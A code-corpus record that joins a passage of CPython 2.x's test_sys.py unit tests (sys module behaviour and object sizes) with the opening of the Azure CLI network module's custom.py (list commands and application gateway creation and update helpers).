"%s doesn't start with %s" % (repr(err), repr(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the unicode message is encoded to the stderr encoding
check_exit_message(
r'import sys; sys.exit(u"h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
if test.test_support.have_unicode:
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
self.assertRaises(OverflowError, sys.setrecursionlimit, 1 << 31)
try:
sys.setrecursionlimit((1 << 31) - 5)
try:
# issue13546: isinstance(e, ValueError) used to fail
# when the recursion limit is close to 1<<31
raise ValueError()
except ValueError, e:
pass
except MemoryError:
# Documentation for setrecursionlimit says: "The highest possible
# limit is platform-dependent. ... a too-high limit can lead to a
# crash" so we allow MemoryError here
pass
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.test_support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.test_support.impl_detail("reference counting")
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.im_func.func_code \
is sys._getframe().f_code
)
@test.test_support.impl_detail("current_frames")
def test_current_frames(self):
have_threads = True
try:
import thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
@test.test_support.reap_threads
def current_frames_with_threads(self):
import threading, thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = thread.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assertIn(0, d)
self.assertTrue(d[0] is sys._getframe())
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, basestring)
self.assertIsInstance(sys.exec_prefix, basestring)
self.assertIsInstance(sys.executable, basestring)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.long_info), 2)
if test.test_support.check_impl_detail(cpython=True):
self.assertTrue(sys.long_info.bits_per_digit % 5 == 0)
else:
self.assertTrue(sys.long_info.bits_per_digit >= 1)
self.assertTrue(sys.long_info.sizeof_digit >= 1)
self.assertEqual(type(sys.long_info.bits_per_digit), int)
self.assertEqual(type(sys.long_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertIsInstance(sys.maxint, int)
if test.test_support.have_unicode:
self.assertIsInstance(sys.maxunicode, int)
self.assertIsInstance(sys.platform, basestring)
self.assertIsInstance(sys.prefix, basestring)
self.assertIsInstance(sys.version, basestring)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
def test_43581(self):
# Can't use sys.stdout, as this is a cStringIO object when
# the test runs under regrtest.
if not (os.environ.get('PYTHONIOENCODING') or
(sys.__stdout__.isatty() and sys.__stderr__.isatty())):
self.skipTest('stdout/stderr encoding is not set')
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug", "py3k_warning", "division_warning", "division_new",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_site", "ignore_environment", "tabcheck", "verbose",
"unicode", "bytes_warning", "hash_randomization")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assertTrue(repr(sys.flags))
@test.test_support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
import subprocess
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, unichr(0xa2).encode("cp424"))
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, '?')
def test_call_tracing(self):
self.assertEqual(sys.call_tracing(str, (2,)), "2")
self.assertRaises(TypeError, sys.call_tracing, str, 2)
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
import subprocess
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c", 'import sys; print repr(sys.executable)'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
executable = p.communicate()[0].strip()
p.wait()
self.assertIn(executable, ["''", repr(sys.executable)])
@test.test_support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.long_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.test_support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
size = test.test_support.calcobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size('l'))
# but lists are
self.assertEqual(sys.getsizeof([]), size('P PP') + gc_header_size)
def test_errors(self):
class BadSizeof(object):
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof(object):
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class OverflowSizeof(long):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.test_support.calcobjsize
self.assertEqual(sys.getsizeof(True, -1), size('l'))
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.test_support.calcobjsize
vsize = test.test_support.calcvobjsize
check = self.check_sizeof
# bool
check(True, size('l'))
# buffer
with test.test_support.check_py3k_warnings():
check(buffer(''), size('2P2Pil'))
# builtin_function_or_method
check(len, size('3P'))
# bytearray
samples = ['', 'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('iPP') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().func_closure[0], size('P'))
# classobj (old-style class)
class class_oldstyle():
def method():
pass
check(class_oldstyle, size('7P'))
# instance (old-style class)
check(class_oldstyle(), size('3P'))
# instancemethod (old-style class)
check(class_oldstyle().method, size('4P'))
# complex
check(complex(0,1), size('2d'))
# code
check(get_cell().func_code, size('4i8Pi3P'))
# BaseException
check(BaseException(), size('3P'))
# UnicodeEncodeError
check(UnicodeEncodeError("", u"", 0, 0, ""), size('5P2PP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", "", 0, 0, ""), size('5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError(u"", 0, 1, ""), size('5P2PP'))
# method_descriptor (descriptor object)
check(str.lower, size('2PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('2PP'))
# getset_descriptor (descriptor object)
import __builtin__
check(__builtin__.file.closed, size('2PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('2P2P'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# dict
check({}, size('3P2P') + 8*calcsize('P2P'))
x = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(x, size('3P2P') + 8*calcsize('P2P') + 16*calcsize('P2P'))
# dictionary-keyview
check({}.viewkeys(), size('P'))
# dictionary-valueview
check({}.viewvalues(), size('P'))
# dictionary-itemview
check({}.viewitems(), size('P'))
# dictionary iterator
check(iter({}), size('P2PPP'))
# dictionary-keyiterator
check({}.iterkeys(), size('P2PPP'))
# dictionary-valueiterator
check({}.itervalues(), size('P2PPP'))
# dictionary-itemiterator
check({}.iteritems(), size('P2PPP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('l3P'))
# file
f = file(test.test_support.TESTFN, 'wb')
try:
check(f, size('4P2i4P3i3P3i'))
finally:
f.close()
test.test_support.unlink(test.test_support.TESTFN)
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('9P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('P'))
# classmethod
check(bar, size('P'))
# generator
def get_gen(): yield 1
check(get_gen(), size('Pi2P'))
# integer
check(1, size('l'))
check(100, size('l'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, vsize('PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('lP'))
# long
check(0L, vsize(''))
check(1L, vsize('') + self.longdigit)
check(-1L, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.long_info.bits_per_digit
check(long(PyLong_BASE), vsize('') + 2*self.longdigit)
check(long(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(long(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('P'))
# None
check(None, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCObject
# PyCapsule
# XXX
# rangeiterator
check(iter(xrange(1)), size('4l'))
# reverse
check(reversed(''), size('PP'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('lP'))
check(frozenset(sample), s + newsize*calcsize('lP'))
# setiterator
check(iter(set()), size('P3P'))
# slice
check(slice(1), size('3P'))
# str
vh = test.test_support._vheader
check('', calcsize(vh + 'lic'))
check('abc', calcsize(vh + 'lic') + 3)
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# tupleiterator
check(iter(()), size('lP'))
# type
s = vsize('P2P15Pl4PP9PP11PI' # PyTypeObject
'39P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'6P' # PyBufferProcs
'2P')
class newstyleclass(object):
pass
check(newstyleclass, s)
# builtin type
check(int, s)
# NotImplementedType
import types
check(types.NotImplementedType, s)
# unicode
usize = len(u'\0'.encode('unicode-internal'))
samples = [u'', u'1'*100]
# we need to test for both sizes, because we don't know if the string
# has been cached
for s in samples:
check(s, size('PPlP') + usize * (len(s) + 1))
# weakref
import weakref
check(weakref.ref(int), size('2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pl2P'))
# xrange
check(xrange(1), size('3l'))
check(xrange(66000), size('3l'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.test_support.calcobjsize
vsize = test.test_support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(''))
# imp.NullImporter
import imp
f = open(test.test_support.TESTFN, 'wb')
try:
check(imp.NullImporter(f.name), size(''))
finally:
f.close()
test.test_support.unlink(test.test_support.TESTFN)
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb != None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_main():
test_classes = (SysModuleTest, SizeofTest)
test.test_support.run_unittest(*test_classes)
if __name__ == "__main__":
test_main()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from collections import Counter, OrderedDict
from msrestazure.tools import parse_resource_id, is_valid_resource_id, resource_id
from knack.log import get_logger
from azure.mgmt.trafficmanager.models import MonitorProtocol, ProfileStatus
# pylint: disable=no-self-use,no-member,too-many-lines,unused-argument
from azure.cli.core.commands import cached_get, cached_put, upsert_to_collection, get_property
from azure.cli.core.commands.client_factory import get_subscription_id, get_mgmt_service_client
from azure.cli.core.util import CLIError, sdk_no_wait, find_child_item, find_child_collection
from azure.cli.core.azclierror import InvalidArgumentValueError, RequiredArgumentMissingError, \
UnrecognizedArgumentError, ResourceNotFoundError, CLIInternalError, ArgumentUsageError
from azure.cli.core.profiles import ResourceType, supported_api_version
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.command_modules.network.zone_file.parse_zone_file import parse_zone_file
from azure.cli.command_modules.network.zone_file.make_zone_file import make_zone_file
import threading
import time
import platform
import subprocess
import tempfile
logger = get_logger(__name__)
# region Utility methods
def _log_pprint_template(template):
import json
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
def _get_default_name(balancer, property_name, option_name):
return _get_default_value(balancer, property_name, option_name, True)
def _get_default_id(balancer, property_name, option_name):
return _get_default_value(balancer, property_name, option_name, False)
def _get_default_value(balancer, property_name, option_name, return_name):
values = [x.id for x in getattr(balancer, property_name)]
if len(values) > 1:
raise CLIError("Multiple possible values found for '{0}': {1}\nSpecify '{0}' "
"explicitly.".format(option_name, ', '.join(values)))
if not values:
raise CLIError("No existing values found for '{0}'. Create one first and try "
"again.".format(option_name))
return values[0].rsplit('/', 1)[1] if return_name else values[0]
# endregion
# region Generic list commands
def _generic_list(cli_ctx, operation_name, resource_group_name):
ncf = network_client_factory(cli_ctx)
operation_group = getattr(ncf, operation_name)
if resource_group_name:
return operation_group.list(resource_group_name)
return operation_group.list_all()
def list_vnet(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'virtual_networks', resource_group_name)
def list_express_route_circuits(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'express_route_circuits', resource_group_name)
def create_express_route_auth(cmd, resource_group_name, circuit_name, authorization_name):
ExpressRouteCircuitAuthorization = cmd.get_models('ExpressRouteCircuitAuthorization')
client = network_client_factory(cmd.cli_ctx).express_route_circuit_authorizations
return client.begin_create_or_update(resource_group_name,
circuit_name,
authorization_name,
ExpressRouteCircuitAuthorization())
def list_lbs(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'load_balancers', resource_group_name)
def list_nics(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_interfaces', resource_group_name)
def list_nsgs(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_security_groups', resource_group_name)
def list_nsg_rules(cmd, resource_group_name, network_security_group_name, include_default=False):
client = network_client_factory(cmd.cli_ctx).network_security_groups
nsg = client.get(resource_group_name, network_security_group_name)
rules = nsg.security_rules
if include_default:
rules = rules + nsg.default_security_rules
return rules
def list_custom_ip_prefixes(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'custom_ip_prefixes', resource_group_name)
def list_public_ips(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'public_ip_addresses', resource_group_name)
def list_public_ip_prefixes(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'public_ip_prefixes', resource_group_name)
def list_route_tables(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'route_tables', resource_group_name)
def list_application_gateways(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'application_gateways', resource_group_name)
def list_network_watchers(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_watchers', resource_group_name)
# endregion
# region ApplicationGateways
# pylint: disable=too-many-locals
def _is_v2_sku(sku):
return 'v2' in sku
# pylint: disable=too-many-statements
def create_application_gateway(cmd, application_gateway_name, resource_group_name, location=None,
tags=None, no_wait=False, capacity=2,
cert_data=None, cert_password=None, key_vault_secret_id=None,
frontend_port=None, http_settings_cookie_based_affinity='disabled',
http_settings_port=80, http_settings_protocol='Http',
routing_rule_type='Basic', servers=None,
sku=None,
private_ip_address=None, public_ip_address=None,
public_ip_address_allocation=None,
subnet='default', subnet_address_prefix='10.0.0.0/24',
virtual_network_name=None, vnet_address_prefix='10.0.0.0/16',
public_ip_address_type=None, subnet_type=None, validate=False,
connection_draining_timeout=0, enable_http2=None, min_capacity=None, zones=None,
custom_error_pages=None, firewall_policy=None, max_capacity=None,
user_assigned_identity=None,
enable_private_link=False,
private_link_ip_address=None,
private_link_subnet='PrivateLinkDefaultSubnet',
private_link_subnet_prefix='10.0.1.0/24',
private_link_primary=None,
trusted_client_cert=None,
ssl_profile=None,
ssl_profile_id=None,
ssl_cert_name=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_application_gateway_resource, build_public_ip_resource, build_vnet_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
tags = tags or {}
sku_tier = sku.split('_', 1)[0] if not _is_v2_sku(sku) else sku
http_listener_protocol = 'https' if (cert_data or key_vault_secret_id) else 'http'
private_ip_allocation = 'Static' if private_ip_address else 'Dynamic'
virtual_network_name = virtual_network_name or '{}Vnet'.format(application_gateway_name)
# Build up the ARM template
master_template = ArmTemplateBuilder()
ag_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
subnet_id = subnet if is_valid_resource_id(subnet) else None
private_ip_allocation = IPAllocationMethod.static.value if private_ip_address \
else IPAllocationMethod.dynamic.value
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if subnet_type == 'new':
ag_dependencies.append('Microsoft.Network/virtualNetworks/{}'.format(virtual_network_name))
vnet = build_vnet_resource(
cmd, virtual_network_name, location, tags, vnet_address_prefix, subnet,
subnet_address_prefix,
enable_private_link=enable_private_link,
private_link_subnet=private_link_subnet,
private_link_subnet_prefix=private_link_subnet_prefix)
master_template.add_resource(vnet)
subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(network_id_template,
virtual_network_name, subnet)
if public_ip_address_type == 'new':
ag_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
public_ip_sku = None
if _is_v2_sku(sku):
public_ip_sku = 'Standard'
public_ip_address_allocation = 'Static'
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
None, public_ip_sku, None))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
private_link_subnet_id = None
private_link_name = 'PrivateLinkDefaultConfiguration'
private_link_ip_allocation_method = 'Dynamic'
if enable_private_link:
private_link_subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(network_id_template,
virtual_network_name,
private_link_subnet)
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
app_gateway_resource = build_application_gateway_resource(
cmd, application_gateway_name, location, tags, sku, sku_tier, capacity, servers, frontend_port,
private_ip_address, private_ip_allocation, cert_data, cert_password, key_vault_secret_id,
http_settings_cookie_based_affinity, http_settings_protocol, http_settings_port,
http_listener_protocol, routing_rule_type, public_ip_id, subnet_id,
connection_draining_timeout, enable_http2, min_capacity, zones, custom_error_pages,
firewall_policy, max_capacity, user_assigned_identity,
enable_private_link, private_link_name,
private_link_ip_address, private_link_ip_allocation_method, private_link_primary,
private_link_subnet_id, trusted_client_cert, ssl_profile, ssl_profile_id, ssl_cert_name)
app_gateway_resource['dependsOn'] = ag_dependencies
master_template.add_variable(
'appGwID',
"[resourceId('Microsoft.Network/applicationGateways', '{}')]".format(
application_gateway_name))
master_template.add_resource(app_gateway_resource)
master_template.add_output('applicationGateway', application_gateway_name, output_type='object')
if cert_password:
master_template.add_secure_parameter('certPassword', cert_password)
template = master_template.build()
parameters = master_template.build_parameters()
# deploy ARM template
deployment_name = 'ag_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def update_application_gateway(cmd, instance, sku=None, capacity=None, tags=None, enable_http2=None, min_capacity=None,
custom_error_pages=None, max_capacity=None):
if sku is not None:
instance.sku.tier = sku.split('_', 1)[0] if not _is_v2_sku(sku) else sku
try:
if min_capacity is not None:
instance.autoscale_configuration.min_capacity = min_capacity
if max_capacity is not None:
instance.autoscale_configuration.max_capacity = max_capacity
except AttributeError:
instance.autoscale_configuration = {
'min_capacity': min_capacity,
'max_capacity': max_capacity
}
with cmd.update_context(instance) as c:
c.set_param('sku.name', sku)
c.set_param('sku.capacity', capacity)
c.set_param('tags', tags)
c.set_param('enable_http2', enable_http2)
c.set_param('custom_error_configurations', custom_error_pages)
return instance
def create_ag_authentication_certificate(cmd, resource_group_name, application_gateway_name, item_name,
cert_data, no_wait=False):
AuthCert = cmd.get_models('ApplicationGatewayAuthenticationCertificate')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_cert = AuthCert(data=cert_data, name=item_name)
upsert_to_collection(ag, 'authentication_certificates', new_cert, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def update_ag_authentication_certificate(instance, parent, item_name, cert_data):
instance.data = cert_data
return parent
def create_ag_backend_address_pool(cmd, resource_group_name, application_gateway_name, item_name,
servers=None, no_wait=False):
ApplicationGatewayBackendAddressPool = cmd.get_models('ApplicationGatewayBackendAddressPool')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_pool = ApplicationGatewayBackendAddressPool(name=item_name, backend_addresses=servers)
upsert_to_collection(ag, 'backend_address_pools', new_pool, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
